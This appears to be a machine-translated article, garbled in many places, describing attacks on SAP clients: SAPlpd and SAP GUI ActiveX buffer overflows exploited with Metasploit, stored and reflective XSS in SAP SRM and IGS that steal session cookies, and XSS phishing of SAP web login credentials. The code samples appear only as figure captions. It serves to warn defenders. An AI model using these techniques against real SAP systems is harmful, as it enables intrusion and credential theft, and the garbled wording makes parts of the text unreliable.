Information security in a complex process, the most important tasks is the security of business applications software.Today, SAP is the most widely used platform for the management of enterprise systems and storage platform for the most important data.Unfortunately, people are concerned about the security of SAP is still insufficient.We described in detail by examples for a number of SAP clients methods of attack in hopes of causing enough attention to security personnel.
I. Introduction
Information security in a complex process, the most important tasks is the security of business applications software.Today, SAP platform is the most widely used enterprise systems and storage management of the most important data of the platform.Unfortunately, people are concerned about the security of SAP is still insufficient.In fact, the various levels in the SAP system, there are still many problems, such as network level, the business system level, database level, application level and that level the SAP client.On the SAP server security literature, spread more, but for a SAP client security presentation, but relatively rare.In fact, even if the SAP server environment is safe, as long as the SAP client-side flaws, then the principle according to Cooper, the security of the entire system would be a dangerous thing.
In this article, we have to discuss is the SAP client security issues.SAP client is not only possible attack from the corporate network, but also may have access to SAP from the server and enterprise business-critical data network and public network user workstations attack.
Second, the use of SAP client overflow attacks
SAPGUI is a standard application that is used to connect SAP and use the data.Use of SAP in large companies, almost all of the SAP client workstations are installed on the application.
Has a complex structure like the other applications, the application also has many loopholes.Given the popularity of this application, in the SAPGUI severity of the vulnerabilities found in IE browser, or comparable to Microsoft office software in the overflow.Basic facilities in terms of Windows Update is quite easy, while the administrator will receive notice of a serious Windows flaw, but the SAP client's situation is different.SAP client has two main security issues, first, the client software does not automatically update the system, the second is the existing problems and solutions of information is still relatively scarce.
Taking into account the SAP system is accessed through a browser, so the SAP Web server vulnerabilities that exist may lead to XSS SAP client for various attacks, and increased the possibility of attacks on client-side SAP.
In this article, we will further examine carefully in the SAP GUI client applications and the SAP Web server, all kinds of loopholes that exist, and the SAP GUI application SAPlpd component buffer overflow.
Early last year, security experts have SAPlpd and SAPsprint components found some buffer overflow vulnerabilities.Component SAPlpd is installed on each user workstation customers SAP applications as part of SAP GUI running on port 515 to provide printing services.People SAPlpd protocol used by a number of flaws have been found, these vulnerabilities allow an attacker to remotely control a vulnerable system, perform denial of service attacks, or stop the print service.Details of these vulnerabilities can be found in SAP's official report.Main feature is the weakness of the service port is closed by default, and only when a user prints a document until the next open.At first glance, this feature increases the difficulty of attacking the user's workstation, in fact not the case.
Taking into account the company using SAP, the general number of SAP customers are hundreds, even thousands, so someone at a given moment the possibility of printing the document is very large.Therefore, you can write a script to scan the network looking for open ports and open ports detected start code to quickly exploit weaknesses in the user's workstation has administrative access.
This is not just a theoretical idea, actually doing it is simple.Specific security vulnerabilities exploit code has been added to the Metasploit framework, while the Metasploit is a free download from the Internet.Attacker needs to do is select a client to use in the shell-code, and then add a module to use db_autopwn the IP address of client workstations on the line.If SAPlpd version has weaknesses, and the user starts a print service at this point, then the attacker can get access to the user's workstation (see Figure 1).In fact, 67% of the SAPGUI installation are vulnerable to such attacks harm.
Figure 1 with SAPlpd for security vulnerabilities on the client access to SAP
Get the user's workstation command prompt access, the attacker can do some more outrageous things, for example, you can install Trojan horse programs to steal passwords, or configuration file from the sapshortcut.ini read user certificate,This allows direct access to SAP servers and critical business data.
Third, SAP GUI ActiveX vulnerabilities in the
In fact, SAP GUI application there are many buffer overflow vulnerability.We discuss below the application SAP GUI ActiveX component in some of the loopholes.SAP GUI from about 1000 different ActiveX components, each of which may be vulnerable ActiveX components.
To take advantage of such loopholes, often require human intervention: the user must click on the link provided in the attacker (these links via email, instant messaging, and so passed to the user), resulting in the fragile parts of the browser being used, so that victimswho access the command prompt to fall into the hands of the attacker.The data show that in general there will be 10% to 50% of users will click through social engineering attacks are malicious link sent to them.Overflow attacks will lead to the vulnerability of the victim's browser component will be executed in the context where, if the victim often start the browser under administrator privileges, then the attacker to obtain the appropriate permissions.
SAP GUI first public vulnerabilities in ActiveX components released in 2007.Meanwhile, in kwedit component has discovered a security vulnerability, in addition, components in the kwedit rfcguisink also found another security hole.After successfully exploited these vulnerabilities, an attacker will get the remote control of client systems access.These vulnerabilities have been patched, and the details can refer to SAP's notice.After the other components were also found in some remote overflow vulnerability.There are some loopholes which have not yet repaired.
June 2009, also discovered a buffer overflow vulnerability.Sapirrfc.dll of this vulnerability and other vulnerabilities discovered in the same can also be used to gain remote control of workstations for victims rights.
To take advantage of this vulnerability, an attacker could design a HTML page to load the page with a vulnerable ActiveX component SAPIrRfc, and then send a line size of more than 720 bytes of parameters to take it over.
Once the user clicks the link, it will cause the user's workstation for denial of service attack, or in the user's workstation remote code execution.Here, you will see a result in a denial of service proof of concept code, as shown:
Figure 2 Sample Code
Overall, these factors increase the risk of attack:
1. In rfcguisink, kwedit and WebViewer3D have found many loopholes exploit code readily available, and many have been included in Metasploit in the.So the attacker needs to do is choose a shell-code, find the user e-mail address, then send an email with a link, which links to the attacker's use of the fragile components of the site.Making it possible to receive a large number of workstations on a corporate shell.
2. In the ons sapirrfc.dll security vulnerabilities have been found in the SAP GUI 7.10 release has been repaired.However, for 6.2 and 6.4 version, still no patch available, it is recommended to upgrade to 7.1 version.Given the current version 6.2 and 6.4 accounted for 10% of the user workstations and 50% (version 7.1 of the user workstations accounted for the remaining 40%), most of the corporate users are still living under the threat of these attacks.
3. In addition to using e-mail or instant messaging, the alternative approach is to attack, the attacker can in enterprise document flow systems such as SAP CFolders create malicious html document.In this case, the people's trust in the document will be significantly higher than the e-mail or instant messaging tool, but in the internal system to upload the document to be relatively more difficult.
Fourth, the use of SAP Web Application Server SAP client exploits
Currently, more and more SAP systems through web transmission, such as SAP Enterprise Portal, SAP SRM, SAP CRM, and many other components, etc.Some programs allow the browser to use the various features of SAP systems and SAP applications look like the popular Web application is no different.However, even the bottom of the SAP NetWeaver platform is built on top of a different Web service application server only.Even without additional components in the default configuration, SAP NetWeaver also with a number of loopholes.
While these vulnerabilities are found in the Web server, but the object of attack is SAP client.Therefore, talking about the safety of the client SAP, must be mentioned in the typical Web application client vulnerability.On the SAP client, we are concerned about vulnerabilities are:?
◆ HTML code injection vulnerability or the storage-type XSS;?
◆ reflective XSS;?
◆ phishing attacks or to intercept the authentication data?
◆ HTML code for XSS injection vulnerabilities and the storage type
Let us examine the application SAP SRM (the application for remote suppliers) in a html injection vulnerabilities (also known as the storage type XSS) example.
SAP SRM system allows you to create HTML document containing any data, and the document placed on the procurement side of the General folder.Therefore, the authenticated users of the system (supply side) can launch a store-type XSS attacks.Suppose the malicious code injection attacks to the entrance page.For example, the buyer can usually access the document exchange folder.In case the buyer successfully view this page, his session certificate (Cookie) will be intercepted and forwarded to the attacker's site.As an example, you can use the following HTML file:
Figure 3 Sample HTML file
As SAP SRM user session is not bound IP address, an attacker can use his cookie is connected to the user environment, and access to other suppliers of document management system functions permissions and privileges.This vulnerability is not only about the details of a similar vulnerability found in the official notification.Described in this communication could allow the entry into any HTML pages and JavaScript, to gain access to other users access to the session.
Remember earlier in the SAPGUI ActiveX component vulnerability in it, if combined with the vulnerability here, it will be a new form of attack.Then load the HTML page requested to call an ActiveX component vulnerability.In this case, if the company's employees opened our documentation, we will be able to access his workstation, and in order for us to further attack laid the foundation for enterprise networks.
Reflective XSS
As mentioned earlier, even in the standard SAP NetWeaver applications, there are also a number of security vulnerabilities, so not to mention the other components.According to security researchers said SAP applications in a variety of published security vulnerabilities have been there about 20.This is already open, for those who have not yet made public, we do not know.
As previously described security hole in SAP SRM, we will examine the SAP IGS in another application in a number of security vulnerabilities.For these vulnerabilities, an attacker must create a link, as follows:
Figure 4 Sample Link
Then, the attacker must be sent to the victim and get his cookie.In the standard SAP environment and other components, such as this there are many vulnerabilities, not to introduce one by one in this.
Using XSS "angling for" authentication data
Use of XSS vulnerabilities, but also may use phishing attacks to sniff the user's authentication data.In the SAP Web application server to find this way of XSS vulnerabilities, and SAP Web Application Server is based on the SAP system.The reason why this vulnerability is that through the web log on to the SAP system, the URL used to represent the standard interface sap / bc / gui / sap / its / webgui / not strictly caused by the filter.
Figure 5 makes the standard Web interface, log in SAP
This allows the URL XSS vulnerability to inject JavaScript code in this way, you can enter the username and password into the form to the page after the contents of the source code.Therefore, it is actually injected into the code to modify the standard input field, and press the submit button when the user input data to the attacker's site under the control of the.Here is the page of the original code fragment:
Original page code fragment in Figure 6
As seen, we can rewrite the code using the input into the form.To achieve this attack, the attacker must be sent to potential victims of a link as follows:
Figure 7 Sample Link
So when the user clicks on this link and enter the authentication data, these data will fall into the attacker's hands.
V. Summary
In this paper, we described in detail by an example client for a number of SAP methods of attack.These loopholes exploit code can be found from the network, so the increased risk factor of these vulnerabilities.We know, for the Web client is a large number of security vulnerabilities, and almost every SAP Web application exists in the client security vulnerabilities.So, I hope to attract staff in charge of the system's security seriously enough.